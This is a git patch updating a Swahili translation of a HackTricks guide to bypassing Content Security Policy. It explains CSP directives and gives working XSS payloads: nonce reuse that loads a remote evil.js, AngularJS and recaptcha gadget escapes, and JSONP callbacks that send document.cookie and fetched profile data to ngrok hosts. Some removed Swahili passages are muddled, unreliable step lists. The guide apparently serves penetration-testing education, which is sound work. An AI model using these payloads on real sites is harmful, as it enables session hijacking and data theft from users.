From 77028b3ce5dde2e9ba4483202cc7bae6ffc46295 Mon Sep 17 00:00:00 2001
From: Translator <github-actions@github.com>
Date: Fri, 15 Mar 2024 22:25:42 +0000
Subject: [PATCH] Translated
 ['pentesting-web/content-security-policy-csp-bypass/README.md

---
 .../README.md                                 | 505 +++++++++---------
 1 file changed, 243 insertions(+), 262 deletions(-)

diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md
index b3c98c495..2afb74f18 100644
--- a/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -1,68 +1,58 @@
-# Kuki ya Usalama wa Yaliyomo (CSP) Inayopita
+# Kizuizi cha Usalama wa Yaliyomo (CSP) Kupitisha
 
 <details>
 
-<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
+<summary><strong>Jifunze kuhusu kuhack AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
 
 Njia nyingine za kusaidia HackTricks:
 
-* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
-* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
-* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
-* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
+* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
+* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
+* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
+* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
 
 </details>
 
 <figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
 
-Jiunge na seva ya [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!
+Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na wataalamu wenye uzoefu wa kuhack na wawindaji wa zawadi za bug!
 
-**Machapisho Kuhusu Kudukua**\
-Shiriki na yaliyomo yanayochunguza msisimko na changamoto za kudukua
+**Machapisho ya Kuhack**\
+Shiriki na yaliyomo yanayochimba kina katika msisimko na changamoto za kuhack
 
-**Habari za Kudukua za Wakati Halisi**\
-Endelea kuwa na habari za ulimwengu wa kudukua kwa kasi kupitia habari na ufahamu wa wakati halisi
+**Taarifa za Kuhack za Muda Halisi**\
+Kaa sawa na ulimwengu wa kuhack wenye kasi kupitia taarifa na ufahamu wa muda halisi
 
-**Matangazo ya Hivi Karibuni**\
-Baki na habari kuhusu tuzo mpya za mdudu zinazozinduliwa na sasisho muhimu za jukwaa
+**Matangazo ya Karibuni**\
+Baki mwelekezwa na zawadi mpya za bug zinazoanzishwa na sasisho muhimu za jukwaa
 
-**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wadukuzi bora leo!
+**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na wahack bora leo!
 
-## CSP ni nini
+## Ni Nini CSP
 
-Kuki ya Usalama wa Yaliyomo (CSP) inatambuliwa kama teknolojia ya kivinjari, iliyolenga hasa **ulinzi dhidi ya mashambulizi kama vile udukuzi wa tovuti (XSS)**. Inafanya kazi kwa kufafanua na kuelezea njia na vyanzo ambavyo rasilimali zinaweza kupakia kwa usalama na kivinjari. Rasilimali hizi zinajumuisha vitu mbalimbali kama picha, fremu, na JavaScript. Kwa mfano, sera inaweza kuruhusu kupakia na kutekeleza rasilimali kutoka kikoa kile kile (self), pamoja na rasilimali za ndani na utekelezaji wa nambari ya herufi kupitia kazi kama vile `eval`, `setTimeout`, au `setInterval`.
+Kizuizi cha Usalama wa Yaliyomo (CSP) kinatambuliwa kama teknolojia ya kivinjari, iliyolenga hasa **kulinda dhidi ya mashambulizi kama vile udukuzi wa tovuti (XSS)**. Kinafanya kazi kwa kufafanua na kuelezea njia na vyanzo ambavyo rasilimali zinaweza kupakiwa kwa usalama na kivinjari. Rasilimali hizi ni pamoja na mambo mbalimbali kama picha, fremu, na JavaScript. Kwa mfano, sera inaweza kuruhusu kupakia na kutekeleza rasilimali kutoka kwa kikoa kile kile (self), ikiwa ni pamoja na rasilimali za ndani na utekelezaji wa nambari ya mstari kupitia kazi kama vile `eval`, `setTimeout`, au `setInterval`.
 
-UTEKELEZAJI wa CSP unafanywa kupitia **vichwa vya majibu** au kwa kuingiza **vipengele vya meta kwenye ukurasa wa HTML**. Kufuatia sera hii, vivinjari hutekeleza kwa ufanisi masharti haya na mara moja kuzuia uvunjaji wowote uliogunduliwa.
+Utekelezaji wa CSP unafanywa kupitia **vichwa vya majibu** au kwa kuingiza **vipengele vya meta kwenye ukurasa wa HTML**. Kufuatia sera hii, vivinjari hutekeleza masharti haya kwa ufanisi na kuzuia mara moja uvunjaji wowote uliogunduliwa.
 
-- Imetekelezwa kupitia kichwa cha majibu:
+* Imetekelezwa kupitia kichwa cha majibu:
 ```
 Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';
 ```
-- Imetekelezwa kupitia lebo ya meta:
-
-```html
-<meta http-equiv="Content-Security-Policy" content="...">
-```
-
-- Inaweza kutekelezwa kwa kutumia lebo ya meta:
-
-```html
-<meta http-equiv="Content-Security-Policy" content="...">
-```
+* Imetekelezwa kupitia lebo ya meta:
 ```xml
 <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
 ```
-### Vichwa vya habari
+### Vichwa
 
-CSP inaweza kutekelezwa au kufuatiliwa kwa kutumia vichwa vya habari hivi:
+CSP inaweza kutekelezwa au kufuatiliwa kwa kutumia vichwa hivi:
 
 * `Content-Security-Policy`: Inatekeleza CSP; kivinjari kinazuia uvunjaji wowote.
-* `Content-Security-Policy-Report-Only`: Hutumiwa kwa ufuatiliaji; inaripoti uvunjaji bila kuwazuia. Ni bora kwa ajili ya majaribio katika mazingira ya awali ya uzalishaji.
+* `Content-Security-Policy-Report-Only`: Hutumika kwa ufuatiliaji; hutoa ripoti za uvunjaji bila kuzuia. Ni bora kwa ajili ya majaribio katika mazingira ya awali kabla ya uzalishaji.
 
-### Kuainisha Rasilmali
+### Kutambua Rasilmali
 
-CSP inazuia asili za kupakia maudhui ya moja kwa moja na ya kubaki, ikidhibiti mambo kama utekelezaji wa JavaScript ya moja kwa moja na matumizi ya `eval()`. Sera ya mfano ni:
+CSP inazuia asili za kupakia yaliyo hai na yaliyo pasifiki, ikidhibiti mambo kama utekelezaji wa JavaScript ya ndani na matumizi ya `eval()`. Sera ya mfano ni:
 ```bash
 default-src 'none';
 img-src 'self';
@@ -74,53 +64,67 @@ frame-src 'self' https://ic.paypal.com https://paypal.com;
 media-src https://videos.cdn.mozilla.net;
 object-src 'none';
 ```
-### Mwongozo
+### Maelekezo
 
-* **script-src**: Inaruhusu vyanzo maalum vya JavaScript, ikiwa ni pamoja na URL, script za ndani, na script zinazosababishwa na wakala wa tukio au XSLT stylesheets.
-* **default-src**: Inaweka sera ya msingi ya kupata rasilimali wakati maelekezo maalum ya kupata hayapo.
-* **child-src**: Inabainisha rasilimali zinazoruhusiwa kwa wafanyakazi wa wavuti na yaliyomo ya fremu iliyowekwa.
-* **connect-src**: Inazuia URL ambazo zinaweza kupakia kwa kutumia interfaces kama vile fetch, WebSocket, XMLHttpRequest.
+* **script-src**: Inaruhusu vyanzo maalum vya JavaScript, ikiwa ni pamoja na URL, script za ndani, na script zinazosababishwa na wakati wa matukio au XSLT stylesheets.
+* **default-src**: Inaweka sera ya msingi kwa kupata rasilimali wakati maelekezo maalum ya kupata hayapo.
+* **child-src**: Inabainisha rasilimali zinazoruhusiwa kwa wafanyakazi wa wavuti na maudhui ya fremu zilizojumuishwa.
+* **connect-src**: Inazuia URL ambazo zinaweza kupakia kutumia interfaces kama vile fetch, WebSocket, XMLHttpRequest.
 * **frame-src**: Inazuia URL kwa fremu.
-* **frame-ancestors**: Inabainisha vyanzo ambavyo vinaweza kuingiza ukurasa wa sasa, inatumika kwa vipengele kama `<frame>`, `<iframe>`, `<object>`, `<embed>`, na `<applet>`.
-* **img-src**: Inafafanua vyanzo vinavyoruhusiwa kwa picha.
+* **frame-ancestors**: Inabainisha ni vyanzo vipi vinaweza kujumuisha ukurasa wa sasa, inayotumika kwa vipengele kama `<frame>`, `<iframe>`, `<object>`, `<embed>`, na `<applet>`.
+* **img-src**: Inaainisha vyanzo vinavyoruhusiwa kwa picha.
 * **font-src**: Inabainisha vyanzo halali kwa fonts zinazopakiwa kwa kutumia `@font-face`.
-* **manifest-src**: Inafafanua vyanzo vinavyoruhusiwa vya faili za maandishi ya maombi.
-* **media-src**: Inafafanua vyanzo vinavyoruhusiwa kwa kupakia vitu vya media.
-* **object-src**: Inafafanua vyanzo vinavyoruhusiwa kwa vipengele vya `<object>`, `<embed>`, na `<applet>`.
-* **base-uri**: Inabainisha URL zinazoruhusiwa kwa kupakia kwa kutumia vipengele vya `<base>`.
-* **form-action**: Inorodhesha vituo halali vya kuwasilisha fomu.
+* **manifest-src**: Inaainisha vyanzo vinavyoruhusiwa vya faili za maandishi ya maombi.
+* **media-src**: Inaainisha vyanzo vinavyoruhusiwa kwa kupakia vitu vya media.
+* **object-src**: Inaainisha vyanzo vinavyoruhusiwa kwa vipengele vya `<object>`, `<embed>`, na `<applet>`.
+* **base-uri**: Inabainisha URL zinazoruhusiwa kwa kupakia kutumia vipengele vya `<base>`.
+* **form-action**: Inaorodhesha vituo halali vya kutuma fomu.
 * **plugin-types**: Inazuia aina za mime ambazo ukurasa unaweza kuita.
 * **upgrade-insecure-requests**: Inaagiza vivinjari kubadilisha URL za HTTP kuwa HTTPS.
-* **sandbox**: Inatumia vizuizi kama sifa ya sandbox ya `<iframe>`.
-* **report-to**: Inabainisha kikundi ambacho ripoti itatumwa ikiwa sera itakiukwa.
-* **worker-src**: Inabainisha vyanzo halali kwa script za Worker, SharedWorker, au ServiceWorker.
-* **prefetch-src**: Inabainisha vyanzo halali kwa rasilimali ambazo zitapakuliwa au kuhifadhiwa mapema.
-* **navigate-to**: Inazuia URL ambazo hati inaweza kuelekea kwa njia yoyote (a, fomu, window.location, window.open, nk.)
-
+* **sandbox**: Inatumia vizuizi sawa na sifa ya sandbox ya `<iframe>`.
+* **report-to**: Inabainisha kikundi ambacho ripoti itatumwa ikiwa sera itavunjwa.
+* **worker-src**: Inabainisha vyanzo halali kwa Worker, SharedWorker, au scripti za ServiceWorker.
+* **prefetch-src**: Inabainisha vyanzo halali kwa rasilimali zitakazopakuliwa au kuhifadhiwa mapema.
+* **navigate-to**: Inazuia URL ambazo waraka unaweza kuhamia kwa njia yoyote (a, fomu, window.location, window.open, n.k.)
 
 ### Vyanzo
 
-* `*`: Inaruhusu URL zote isipokuwa zile zenye mpango wa `data:`, `blob:`, `filesystem:`.
-* `'self'`: Inaruhusu kupakia kutoka kwenye kikoa kile kile.
-* `'data'`: Inaruhusu rasilimali kupakia kupitia mpango wa data (k.m., picha zilizofungwa kwa msingi wa Base64).
+* `*`: Inaruhusu URL zote isipokuwa zile zenye mipango ya `data:`, `blob:`, `filesystem:`.
+* `'self'`: Inaruhusu kupakia kutoka kwa kikoa kile kile.
+* `'data'`: Inaruhusu rasilimali kupakiwa kupitia mpango wa data (k.m., picha zilizofungwa kwa Base64).
 * `'none'`: Inazuia kupakia kutoka kwa chanzo chochote.
-* `'unsafe-eval'`: Inaruhusu matumizi ya `eval()` na njia sawa, sio ilipendekezwa kwa sababu za usalama.
-* `'unsafe-hashes'`: Inawezesha wakala wa tukio za ndani maalum.
-* `'unsafe-inline'`: Inaruhusu matumizi ya rasilimali za ndani kama `<script>` au `<style>`, sio ilipendekezwa kwa sababu za usalama.
-* `'nonce'`: Orodha nyeupe kwa script za ndani maalum zikitumia nonce ya kriptografia (nambari inayotumiwa mara moja).
-* `'sha256-<hash>'`: Orodha nyeupe ya script zenye hash ya sha256 maalum.
-* `'strict-dynamic'`: Inaruhusu kupakia script kutoka kwa chanzo chochote ikiwa imeorodheshwa kwenye nonce au hash.
-* `'host'`: Inabainisha mwenyeji maalum, kama `example.com`.
-* `https:`: Inazuia URL zile zinazotumia HTTPS tu.
-* `blob:`: Inaruhusu rasilimali kupakia kutoka kwa URL za Blob (k.m., URL za Blob zilizoundwa kupitia JavaScript).
-* `filesystem:`: Inaruhusu rasilimali kupakia kutoka kwa mfumo wa faili.
-* `'report-sample'`: Inajumuisha sampuli ya nambari inayokiuka katika ripoti ya ukiukaji (inayofaa kwa ajili ya kutatua matatizo).
-* `'strict-origin'`: Sawa na 'self' lakini inahakikisha kiwango cha usalama cha itifaki ya vyanzo kinalingana na hati (vyanzo salama tu vinaweza kupakia rasilimali kutoka kwa vyanzo salama).
-* `'strict-origin-when-cross-origin'`: Inatuma URL kamili wakati wa kufanya maombi ya asili sawa lakini inatuma asili tu wakati ombi ni la asili ya msalaba.
-* `'unsafe-allow-redirects'`: Inaruhusu kupakia rasilimali ambazo zitaelekeza mara moja kwa rasilimali nyingine. Sio ilipendekezwa kwa sababu inapunguza usalama.
+* `'unsafe-eval'`: Inaruhusu matumizi ya `eval()` na njia zinazofanana, sio kupendekezwa kwa sababu za usalama.
+* `'unsafe-hashes'`: Inawezesha wakurugenzi wa matukio ya ndani maalum.
+* `'unsafe-inline'`: Inaruhusu matumizi ya rasilimali za ndani kama vile ndani ya `<script>` au `<style>`, sio kupendekezwa kwa sababu za usalama.
+* `'nonce'`: Orodha nyeupe kwa scripti za ndani maalum zikitumia nonce ya kriptografia (namba inayotumiwa mara moja).
+* Ikiwa una utekelezaji mdogo wa JS inawezekana kupata nonce iliyotumiwa ndani ya ukurasa na `doc.defaultView.top.document.querySelector("[nonce]")` na kisha kutumia tena kuiweka scripti yenye nia mbaya (ikiwa strict-dynamic inatumika, chanzo chochote kilichoruhusiwa kinaweza kupakia vyanzo vipya hivyo hii haifai), kama ifuatavyo:
 
+<details>
 
-## Sheria Hatari za CSP
+<summary>Pakia scripti ukitumia tena nonce</summary>
+```html
+<!-- From https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/ -->
+<img src=x ng-on-error='
+doc=$event.target.ownerDocument;
+a=doc.defaultView.top.document.querySelector("[nonce]");
+b=doc.createElement("script");
+b.src="//example.com/evil.js";
+b.nonce=a.nonce; doc.body.appendChild(b)'>
+```
+</details>
+
+* `'sha256-<hash>'`: Inaweka orodha nyeupe ya scripts na hash maalum ya sha256.
+* `'strict-dynamic'`: Inaruhusu kupakia scripts kutoka chanzo chochote ikiwa imewekwa kwenye nonce au hash.
+* `'host'`: Inabainisha mwenyeji maalum, kama vile `example.com`.
+* `https:`: Inazuia URLs zinazotumia HTTPS tu.
+* `blob:`: Inaruhusu rasilimali kupakia kutoka kwenye URL za Blob (k.m., URL za Blob zilizoundwa kupitia JavaScript).
+* `filesystem:`: Inaruhusu rasilimali kupakia kutoka kwenye mfumo wa faili.
+* `'report-sample'`: Inajumuisha sampuli ya nambari inayokiuka katika ripoti ya ukiukaji (inayofaa kwa ajili ya kutatua hitilafu).
+* `'strict-origin'`: Sawa na 'self' lakini inahakikisha kiwango cha usalama wa itifaki ya vyanzo vinavyolingana na hati (vyanzo salama tu vinaweza kupakia rasilimali kutoka vyanzo salama).
+* `'strict-origin-when-cross-origin'`: Inatuma URLs kamili wakati wa kufanya maombi ya asili lakini inatuma asili tu wakati ombi ni la msalaba-asili.
+* `'unsafe-allow-redirects'`: Inaruhusu rasilimali kupakia ambazo zitaelekeza mara moja kwenye rasilimali nyingine. Sio rahisi kama inavyoweza kudhoofisha usalama.
+
+## Sheria za CSP Zisizo Salama
 
 ### 'unsafe-inline'
 ```yaml
@@ -144,7 +148,7 @@ Payload inayofanya kazi:
 ```
 ### strict-dynamic
 
-Ikiwa kwa namna fulani unaweza kufanya **msimbo wa JS ulioruhusiwa uunde lebo mpya ya skripti** katika DOM na msimbo wako wa JS, kwa sababu skripti iliyoruhusiwa inaunda hiyo, **lebo mpya ya skripti itaruhusiwa kutekelezwa**.
+Ikiwa kwa namna fulani unaweza kufanya **msimbo wa JS ulioruhusiwa uunde lebo mpya ya script** katika DOM na msimbo wako wa JS, kwa sababu script iliyoruhusiwa inaunda hiyo, **lebo mpya ya script itaruhusiwa kutekelezwa**.
 
 ### Wildcard (\*)
 ```yaml
@@ -158,7 +162,7 @@ Payload inayofanya kazi:
 ### Ukosefu wa object-src na default-src
 
 {% hint style="danger" %}
-**Inaonekana kama hii haifanyi kazi tena**
+**Inaonekana kama hii sio tena inafanya kazi**
 {% endhint %}
 ```yaml
 Content-Security-Policy: script-src 'self' ;
@@ -169,43 +173,31 @@ Mizigo inayofanya kazi:
 ">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
 <param name="AllowScriptAccess" value="always"></object>
 ```
-### Kuleta Faili + 'self'
-
-Kwa kawaida, sera ya usalama wa maudhui (CSP) inazuia kuleta faili kutoka vyanzo vingine isipokuwa chanzo cha tovuti yenyewe. Hata hivyo, kuna njia ya kuzunguka hii kwa kutumia sera ya CSP iliyo na kipengele cha 'self'.
-
-Kipengele cha 'self' kinawezesha kuleta faili kutoka kwenye chanzo cha tovuti yenyewe. Kwa hiyo, tunaweza kutumia hili kwa faida yetu kwa kuleta faili kutoka kwenye tovuti yetu wenyewe.
-
-Hapa kuna hatua za kufuata ili kufanikisha hili:
-
-1. Tengeneza tovuti bandia ambayo itakuwa chanzo cha faili tunayotaka kuleta.
-2. Weka sera ya CSP kwenye tovuti yetu halisi ili kuruhusu kuleta faili kutoka kwenye chanzo cha 'self'.
-3. Tumia faili ya JavaScript kwenye tovuti yetu halisi ili kuleta faili kutoka kwenye tovuti bandia.
-
-Kwa kufuata hatua hizi, tunaweza kuzunguka sera ya CSP na kuleta faili kutoka kwenye chanzo cha tovuti yetu wenyewe.
+### Kupakia Faili + 'self'
 ```yaml
 Content-Security-Policy: script-src 'self';  object-src 'none' ;
 ```
-Ikiwa unaweza kupakia faili ya JS, unaweza kuzunguka CSP hii:
+Ikiwa unaweza kupakia faili ya JS unaweza kuzidi CSP hii:
 
 Payload inayofanya kazi:
 ```markup
 "/>'><script src="/uploads/picture.png.js"></script>
 ```
-Hata hivyo, ni kawaida sana kwamba seva inathibitisha faili iliyopakiwa na itakuruhusu tu kupakia aina fulani ya faili.
+Hata hivyo, ni uwezekano mkubwa kwamba server ina **thibitisha faili iliyopakiwa** na itaruhusu tu **kupakia aina iliyodhamiriwa ya faili**.
 
-Zaidi ya hayo, hata kama unaweza kupakia msimbo wa JS ndani ya faili kwa kutumia kipengele kinachokubaliwa na seva (kama vile: _script.png_), hii haitoshi kwa sababu baadhi ya seva kama seva ya apache huchagua aina ya MIME ya faili kulingana na kipengele na vivinjari kama Chrome vitakataa kutekeleza msimbo wa Javascript ndani ya kitu ambacho kinapaswa kuwa picha. "Kwa bahati nzuri", kuna makosa. Kwa mfano, kutoka kwa CTF nilijifunza kwamba Apache haitambui kipengele cha _**.wave**_, kwa hivyo haitoi kwa aina ya MIME kama audio/\*.
+Zaidi ya hayo, hata kama ungeweza kupakia **msimbo wa JS ndani** ya faili ukitumia kipanuzi kinachokubaliwa na server (kama vile: _script.png_), hii haitoshi kwa sababu baadhi ya server kama server ya apache **huchagua aina ya MIME ya faili kulingana na kipanuzi** na vivinjari kama Chrome **vitakataa kutekeleza msimbo wa Javascript** ndani ya kitu ambacho kinapaswa kuwa picha. "Kwa bahati mbaya", kuna makosa. Kwa mfano, kutoka kwenye CTF nilijifunza kwamba **Apache haifahamu** kipanuzi cha _**.wave**_, hivyo haipatii na **aina ya MIME kama audio/\***.
 
-Kutoka hapa, ikiwa utapata XSS na kupakia faili, na utafanikiwa kupata kipengele kilichochanganywa, unaweza kujaribu kupakia faili na kipengele hicho na Maudhui ya script. Au, ikiwa seva inachunguza muundo sahihi wa faili iliyopakiwa, unaweza kuunda polyglot ([baadhi ya mifano ya polyglot hapa](https://github.com/Polydet/polyglot-database)).
+Kutoka hapa, ikiwa unapata XSS na upakiaji wa faili, na unafanikiwa kupata **kipanuzi kilichochanganyikiwa**, unaweza kujaribu kupakia faili yenye kipanuzi hicho na Maudhui ya script. Au, ikiwa server inathibitisha muundo sahihi wa faili iliyopakiwa, tengeneza polyglot ([baadhi ya mifano ya polyglot hapa](https://github.com/Polydet/polyglot-database)).
 
-### Nukta ya Tatu ya Mawasiliano ya Nje + ('unsafe-eval')
+### Vielekezi vya Watu Wengine + ('unsafe-eval')
 
 {% hint style="warning" %}
-Kwa baadhi ya malipo ya kufuatia, **`unsafe-eval` hata haihitajiki**.
+Kwa baadhi ya mzigo ufuatao **`unsafe-eval` hata haifai**.
 {% endhint %}
 ```yaml
 Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval';
 ```
-Pakia toleo lenye udhaifu la angular na tekeleza JS yoyote:
+Pakia toleo lenye kasoro la angular na tekeleza JS ya kupendelea:
 ```xml
 <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
 <div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>
@@ -226,10 +218,10 @@ With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-a
 <img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
 >
 ```
-#### Mipangilio ya kutumia Angular + maktaba na kazi zinazorudisha kifaa cha `window` ([angalia chapisho hili](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
+#### Payloads zinazotumia Angular + maktaba na kazi zinazorudisha kitu cha `window` ([angalia chapisho hili](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):
 
 {% hint style="info" %}
-Chapisho linaonyesha kuwa unaweza **kupakia** maktaba zote kutoka `cdn.cloudflare.com` (au maktaba zingine zinazoruhusiwa za JS), kutekeleza kazi zote zilizoongezwa kutoka kila maktaba, na kuangalia **kazi zipi kutoka kwa maktaba zipi zinarudisha kifaa cha `window`**.
+Chapisho linaonyesha kwamba unaweza **kupakia** maktaba zote kutoka `cdn.cloudflare.com` (au maktaba zingine za JS zilizoruhusiwa), tekeleza kazi zote zilizoongezwa kutoka kila maktaba, na angalia **kazi zipi kutoka maktaba zipi zinarudisha kitu cha `window`**.
 {% endhint %}
 ```markup
 <script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>
@@ -256,7 +248,7 @@ Chapisho linaonyesha kuwa unaweza **kupakia** maktaba zote kutoka `cdn.cloudflar
 ```
 #### Kudhuru kanuni ya JS ya google recaptcha
 
-Kulingana na [**hii CTF writeup**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?\_x\_tr\_sl=es&\_x\_tr\_tl=en&\_x\_tr\_hl=es&\_x\_tr\_pto=wapp#noteninja-3-solves) unaweza kudhuru [https://www.google.com/recaptcha/](https://www.google.com/recaptcha/) ndani ya CSP ili kutekeleza kanuni ya JS isiyo na mipaka kwa kupita kwenye CSP:
+Kulingana na [**hii CTF writeup**](https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?\_x\_tr\_sl=es&\_x\_tr\_tl=en&\_x\_tr\_hl=es&\_x\_tr\_pto=wapp#noteninja-3-solves) unaweza kutumia [https://www.google.com/recaptcha/](https://www.google.com/recaptcha/) ndani ya CSP kutekeleza kanuni ya JS ya kupita kwenye CSP:
 ```html
 <div
 ng-controller="CarouselController as c"
@@ -267,26 +259,26 @@ ng-init="c.init()"
 
 <script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>
 ```
-### Njia za Tatu za Mawasiliano + JSONP
+Zaidi [**payloads kutoka kwenye andiko hili**](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/):
+```html
+<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script>
 
-#### Maelezo
+<!-- Trigger alert -->
+<img src=x ng-on-error='$event.target.ownerDocument.defaultView.alert(1)'>
 
-Mara nyingi, sera ya usalama wa maudhui (CSP) inazuia upakiaji wa rasilimali kutoka kwa vyanzo vya tatu kwenye tovuti. Hii inalenga kuzuia mashambulizi ya kuingiza maudhui (XSS) na kudhibiti upatikanaji wa rasilimali za tovuti. Walakini, kuna njia kadhaa za kuzunguka sera hii na kupata rasilimali kutoka kwa vyanzo vya tatu.
-
-Moja ya njia hizi ni kutumia JSONP (JSON with Padding). JSONP ni njia ya zamani ya kuruhusu mawasiliano ya kuvuka kwa kivinjari kati ya tovuti tofauti. Inaruhusu tovuti ya kwanza kuomba data kutoka kwa tovuti ya pili kwa kutumia skripti ya JavaScript. JSONP inafanya kazi kwa kuongeza data ya JSON kwenye mwitikio wa skripti ya JavaScript, ambayo inaruhusu tovuti ya kwanza kusoma data hiyo.
-
-#### Jinsi ya Kuzunguka Sera ya Usalama wa Maudhui (CSP) kwa Kutumia JSONP
-
-1. Tafuta sehemu ya tovuti ambayo inaruhusu upakiaji wa skripti za JavaScript kutoka kwa vyanzo vya tatu.
-2. Tengeneza skripti ya JavaScript ambayo inaomba data kutoka kwa tovuti ya pili kwa kutumia JSONP.
-3. Ongeza skripti ya JavaScript kwenye sehemu ya tovuti ambayo inaruhusu upakiaji wa skripti za JavaScript kutoka kwa vyanzo vya tatu.
-4. Hakikisha kuwa tovuti ya pili inarudisha data ya JSONP kwa tovuti ya kwanza.
-
-Kwa kufuata hatua hizi, unaweza kuzunguka sera ya usalama wa maudhui (CSP) na kupata rasilimali kutoka kwa vyanzo vya tatu kwenye tovuti. Hii inaweza kutumiwa kwa madhumuni ya uchunguzi wa usalama au kwa kufanya mashambulizi ya kuingiza maudhui (XSS).
+<!-- Reuse nonce -->
+<img src=x ng-on-error='
+doc=$event.target.ownerDocument;
+a=doc.defaultView.top.document.querySelector("[nonce]");
+b=doc.createElement("script");
+b.src="//example.com/evil.js";
+b.nonce=a.nonce; doc.body.appendChild(b)'>
+```
+### Vielekezi vya Tatu + JSONP
 ```http
 Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none';
 ```
-Hali kama hii ambapo `script-src` imewekwa kama `self` na kikoa maalum ambacho kimeorodheshwa kwenye orodha nyeupe inaweza kuzidiwa kwa kutumia JSONP. Njia za JSONP huruhusu njia za kurejesha zisizo salama ambazo huruhusu mshambuliaji kutekeleza XSS, mzigo unaofanya kazi:
+Mazingira kama haya ambapo `script-src` imewekwa kama `self` na kikoa fulani ambacho kimeorodheshwa kwenye orodha nyeupe inaweza kukiukwa kwa kutumia JSONP. Vituo vya JSONP huruhusu njia za kurejelea zisizo salama ambazo huruhusu mshambuliaji kutekeleza XSS, mzigo wa kazi:
 ```markup
 "><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
 "><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
@@ -296,144 +288,130 @@ Hali kama hii ambapo `script-src` imewekwa kama `self` na kikoa maalum ambacho k
 https://www.youtube.com/oembed?callback=alert;
 <script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script>
 ```
-[**JSONBee**](https://github.com/zigoo0/JSONBee) **inayoendelea JSONP endpoints tayari kutumia kwa kusudi la kukiuka CSP ya tovuti mbalimbali.**
+[**JSONBee**](https://github.com/zigoo0/JSONBee) **inaendelea kutumia JSONP endpoints kwa kuzidi kwa CSP kwenye tovuti tofauti.**
 
